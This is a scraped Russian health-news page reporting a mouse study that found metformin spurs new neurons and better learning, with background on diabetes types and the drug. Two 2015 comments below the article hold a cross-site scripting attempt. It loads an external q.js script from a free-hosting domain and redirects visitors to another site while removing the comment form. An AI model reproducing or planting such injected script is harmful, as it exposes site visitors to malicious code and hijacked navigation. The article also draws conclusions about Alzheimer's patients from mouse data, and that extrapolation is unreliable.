Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Если вы лечите диабет – б...  >>  Если вы лечите диабет – будете умнее!
 
Обратная связь
 

Если вы лечите диабет – будете умнее!

Размер шрифта
29 августа 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Канадские ученые установили, что метформин способствует образованию новых нейронов в головном мозге.

Что такое сахарный диабет

Сахарный диабет – это заболевание, при котором наблюдается стойкое повышение уровня глюкозы в крови. Выделяют сахарный диабет 1 типа и сахарный диабет 2 типа. При сахарном диабете 1 типа происходит разрушение клеток поджелудочной железы, в которых образуется инсулин. Инсулин необходим нашему организму для снижения уровня глюкозы в крови. Оставшиеся клетки поджелудочной железы не могут удовлетворить потребности организма в инсулине, поэтому большая часть глюкозы не поступает в клетки, а остается в крови.

При сахарном диабете 2 типа клетки поджелудочной железы не страдают, и в организме находится достаточное количество инсулина. Однако клетки теряют чувствительность к инсулину – развивается так называемая инсулинорезистентность. Если представить, что инсулин – это ключик, который открывает клетку для глюкозы, то при инсулинорезистентности ключик не подходит к замку и не может открыть клетку. В результате глюкоза не поступает в клетки и остается в крови.

Что такое метформин

Метформин – это лекарственный препарат, который применяется для лечения сахарного диабета 2 типа. Он снижает концентрацию глюкозы в крови за счет угнетения образования глюкозы в печени, уменьшения всасывания глюкозы из желудочно-кишечного тракта и более интенсивного использования глюкозы в тканях. Следует отметить, что препарат работает только при наличии инсулина в крови.

История вопроса

В предыдущих исследованиях ученые установили, что важную роль в превращении стволовых нервных клеток в зрелые нейроны играет определенный сигнальный путь. Ранее было доказано, что тот же сигнальный путь определяет метаболические эффекты метформина в клетках печени.

Суть исследования

Опираясь на имеющиеся данные, ученые предположили, что метформин может активировать сигнальный путь не только в печени, но и в головном мозге. Гипотеза подтвердилась в исследовании на мышах. У мышей, которые получали метформин, не только появлялись новые нейроны, но и улучшалась способность к обучению.

Результаты

Полученные результаты позволяют говорить о том, что метформин улучшает функцию головного мозга у пациентов с болезнью Альцгеймера. Ранее считалось, что улучшение наступает в связи с эффективным лечением сахарного диабета, однако, теперь стало понятно, что оно связано с восстановлением ткани головного мозга. В дальнейшем ученые планируют провести новое исследование, которое позволит установить, сможет ли метформин помочь пациентам, получившим черепно-мозговую травму или прошедшим курс лучевой терапии.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Что влияет на показатели сахара?   Косметика вызывает диабет   Высокий сахар в крови приводит к старческому слабоумию   Факторы риска сахарного диабета 2 типа  
04 сентября 2012Косметика вызывает диабет! 28 августа 2012Если вы лечите диабет – будете умнее!
 
13 августа 2012Всего две инъекции антител вылечат сахарный диабет! 09 апреля 2013Знаете ли вы ваш уровень сахара
 

Слайдшоу

1
Лучшая и худшая еда для диабета. Часть 2
Сахар – это наркотик?
Как побороть зависимость от сахара

Тесты

1
Есть ли у вас скрытый риск диабета?
Оцените риск развития сахарного диабета
Что вы знаете о поджелудочной железе?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.